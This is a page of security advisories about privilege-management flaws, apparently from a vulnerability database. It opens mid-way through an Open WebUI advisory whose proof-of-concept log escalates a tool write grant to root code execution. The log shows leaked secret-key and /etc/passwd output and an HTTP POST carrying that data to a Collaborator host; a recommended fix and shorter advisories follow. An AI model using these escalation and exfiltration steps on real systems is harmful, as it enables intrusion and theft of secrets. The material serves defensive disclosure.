c945be42-6fd7-465d-80c9-2d5a99eb6c2f\n Bob\u0027s role: user (NO workspace.tools)\n\nStep 2: Disabling workspace.tools globally...\n workspace.tools = false (globally)\n\nStep 2b: Verifying bob CANNOT create tools (no permission)...\n POST /tools/create as bob: HTTP 401\n Correctly denied: 401 Unauthorized\n\nStep 3: Re-enabling workspace.tools for attacker, creating benign tool...\n Tool \u0027poc_rce_2\u0027 created by attacker\n\nStep 4: Attacker grants write access on poc_rce_2 to bob...\n Grant response: HTTP 200\n Bob now has write access on poc_rce_2\n\nStep 5: Disabling workspace.tools globally again...\n workspace.tools = false (globally)\n\nStep 6: Bob updates tool content with malicious Python...\n Bob has: write grant on poc_rce_2 ONLY\n Bob lacks: workspace.tools permission\n Endpoint: POST /api/v1/tools/id/poc_rce_2/update\n HTTP Status: 200\n Tool updated exec() ran with bob\u0027s request!\n\nStep 7: Reading exfiltrated proof from DB...\n\nPRIVILEGE ESCALATION CONFIRMED:\n{\n \"poc\": \"Privilege Escalation: write-grant on tool -\u003e RCE (no workspace.tools needed)\",\n \"vuln\": \"tools.py:467-481 update endpoint has NO workspace.tools check\",\n \"whoami\": \"root\",\n \"hostname\": \"3ffa54b2792d\",\n \"cwd\": \"/app/backend\",\n \"python\": \"/usr/local/bin/python3\",\n \"pid\": 1,\n \"platform\": \"Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36\",\n \"secret_key\": \"9GDyak0KOfrakPTM...\",\n \"etc_passwd_head\": \"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\\nsync:x:4:65534:sync:/bin:/bin/sync\\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\\nlp:x:7:7:lp:/va\"\n}\n```\n\n### Burp Collaborator Evidence\n\n\u003cimg width=\"1198\" height=\"555\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f643d26b-47eb-49b8-8178-7348ee57afe3\" /\u003e\n\n\nThe container made an outbound HTTP POST to a Collaborator server, confirming code execution from within the container:\n\n```http\nPOST /poc2 HTTP/1.1\nAccept-Encoding: identity\nContent-Length: 720\nHost: jvi4qe8yi4bu1x1wixnmktgp9gf73xrm.oastify.com\nUser-Agent: Python-urllib/3.11\nContent-Type: application/json\nConnection: close\n\n{\"poc\": \"Privilege Escalation: write-grant on tool -\u003e RCE (no workspace.tools needed)\",\n \"vuln\": \"tools.py:467-481 update endpoint has NO workspace.tools check\",\n \"whoami\": \"root\", \"hostname\": \"3ffa54b2792d\", \"cwd\": \"/app/backend\",\n \"python\": \"/usr/local/bin/python3\", \"pid\": 1,\n \"platform\": \"Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36\",\n \"secret_key\": \"9GDyak0KOfrakPTM...\",\n \"etc_passwd_head\": \"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:...\"}\n```\n\n## Security Boundary Violated\n\nOpen WebUI\u0027s security policy defines `workspace.tools` as the trust boundary for code execution:\n\n\u003e *\"Tool creation is controlled by the workspace.tools permission, which is disabled by default for non-admin users and should only be granted to fully trusted users who are equivalent to system administrators in terms of trust. Granting a user the ability to create Tools is equivalent to giving them shell access to the server.\"*\n\nThis vulnerability breaks that boundary:\n\n| Check | Create endpoint (line 333) | Update endpoint (line 467) |\n|-------|---------------------------|---------------------------|\n| `user.role == \u0027admin\u0027` | Yes | Yes |\n| `has_permission(\u0027workspace.tools\u0027)` | **Yes** | **No** |\n| `has_permission(\u0027workspace.tools_import\u0027)` | **Yes** | **No** |\n| `AccessGrants.has_access(\u0027write\u0027)` | No | Yes |\n| `tools.user_id == user.id` | No (new tool) | Yes |\n\nThe update endpoint substitutes `AccessGrants.has_access(\u0027write\u0027)` where `has_permission(\u0027workspace.tools\u0027)` should be. A `write` grant is a collaboration primitive for editing content; `workspace.tools` is the code execution trust boundary. These are different privilege levels, but the update endpoint conflates them.\n\n## Impact\n\nAn attacker with a regular user account and a `write` access grant on any single tool can:\n\n- Execute arbitrary server-side code as root (PID 1 in the default Docker deployment)\n- Read sensitive environment variables (`WEBUI_SECRET_KEY`, `OPENAI_API_KEY`, etc.)\n- Read/write the application database (all users\u0027 chats, files, API keys)\n- Read arbitrary files from the container filesystem\n- Make outbound network requests to internal services\n\nThe attacker **never** needs `workspace.tools` permission. The administrator\u0027s explicit decision to deny this user code execution capability is bypassed.\n\n## Remediation\n\n### Recommended Fix\n\nAdd the `workspace.tools` permission check to the update endpoint, matching the create endpoint\u0027s authorization gate:\n\n**File**: `backend/open_webui/routers/tools.py`, after line 481 (after the existing access check)\n\n```python\n# Add workspace.tools check for content changes (code execution)\nif form_data.content != tools.content:\n if user.role != \u0027admin\u0027 and not (\n await has_permission(\n user.id, \u0027workspace.tools\u0027,\n request.app.state.config.USER_PERMISSIONS, db=db\n )\n or await has_permission(\n user.id, \u0027workspace.tools_import\u0027,\n request.app.state.config.USER_PERMISSIONS, db=db\n )\n ):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=ERROR_MESSAGES.UNAUTHORIZED,\n )\n```\n\nThis allows users with `write` grants to update tool metadata (name, description, valves) without `workspace.tools`, but requires the permission for content changes that trigger code execution.",
"id": "GHSA-p4fx-23fq-jfg6",
"modified": "2026-05-15T23:55:10Z",
"published": "2026-05-14T20:26:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-p4fx-23fq-jfg6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45395"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: Missing `workspace.tools` Authorization Check on Tool Update Endpoint Allows Privilege Escalation to Code Execution"
}
GHSA-P4HH-MQ57-GQ8X
Vulnerability from github – Published: 2026-03-25 21:30 – Updated: 2026-03-27 19:50An issue in ralphje Signify before v.0.9.2 allows a remote attacker to escalate privileges via the signed_data.py and the context.py components
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "signify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-70887"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T19:50:18Z",
"nvd_published_at": "2026-03-25T19:16:28Z",
"severity": "HIGH"
},
"details": "An issue in ralphje Signify before v.0.9.2 allows a remote attacker to escalate privileges via the signed_data.py and the context.py components",
"id": "GHSA-p4hh-mq57-gq8x",
"modified": "2026-03-27T19:50:18Z",
"published": "2026-03-25T21:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70887"
},
{
"type": "WEB",
"url": "https://github.com/mtrojnar/osslsigncode/issues/475"
},
{
"type": "WEB",
"url": "https://github.com/ralphje/signify/issues/60"
},
{
"type": "WEB",
"url": "https://github.com/mtrojnar/osslsigncode/pull/477"
},
{
"type": "WEB",
"url": "https://github.com/ralphje/signify/commit/64f21c0cc06cea0536370686ca3ba7a01e4adaa8"
},
{
"type": "WEB",
"url": "https://github.com/mtrojnar/osslsigncode/releases/tag/2.11"
},
{
"type": "PACKAGE",
"url": "https://github.com/ralphje/signify"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Signify allows a remote attacker to escalate privileges via the signed_data.py and the context.py components"
}
GHSA-P4HR-CR9G-PFGG
Vulnerability from github – Published: 2022-06-29 00:00 – Updated: 2022-07-12 00:00A vulnerability, which was classified as problematic, was found in ShadeYouVPN.com Client 2.0.1.11. Affected is an unknown function. The manipulation leads to improper privilege management. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.1.12 is able to address this issue. It is recommended to upgrade the affected component.
{
"affected": [],
"aliases": [
"CVE-2017-20107"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-28T07:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability, which was classified as problematic, was found in ShadeYouVPN.com Client 2.0.1.11. Affected is an unknown function. The manipulation leads to improper privilege management. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.1.12 is able to address this issue. It is recommended to upgrade the affected component.",
"id": "GHSA-p4hr-cr9g-pfgg",
"modified": "2022-07-12T00:00:57Z",
"published": "2022-06-29T00:00:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20107"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.97122"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2017/Feb/28"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P4J8-4HV2-8733
Vulnerability from github – Published: 2022-07-13 00:00 – Updated: 2025-10-22 00:32Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.
{
"affected": [],
"aliases": [
"CVE-2022-22047"
],
"database_specific": {
"cwe_ids": [
"CWE-269",
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-12T23:15:00Z",
"severity": "HIGH"
},
"details": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.",
"id": "GHSA-p4j8-4hv2-8733",
"modified": "2025-10-22T00:32:33Z",
"published": "2022-07-13T00:00:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22047"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22047"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-22047"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-48
Strategy: Separation of Privilege
Follow the principle of least privilege when assigning access rights to entities in a software system.
Mitigation MIT-49
Strategy: Separation of Privilege
Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.
CAPEC-122: Privilege Abuse
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.
CAPEC-233: Privilege Escalation
An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.
CAPEC-58: Restful Privilege Elevation
An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.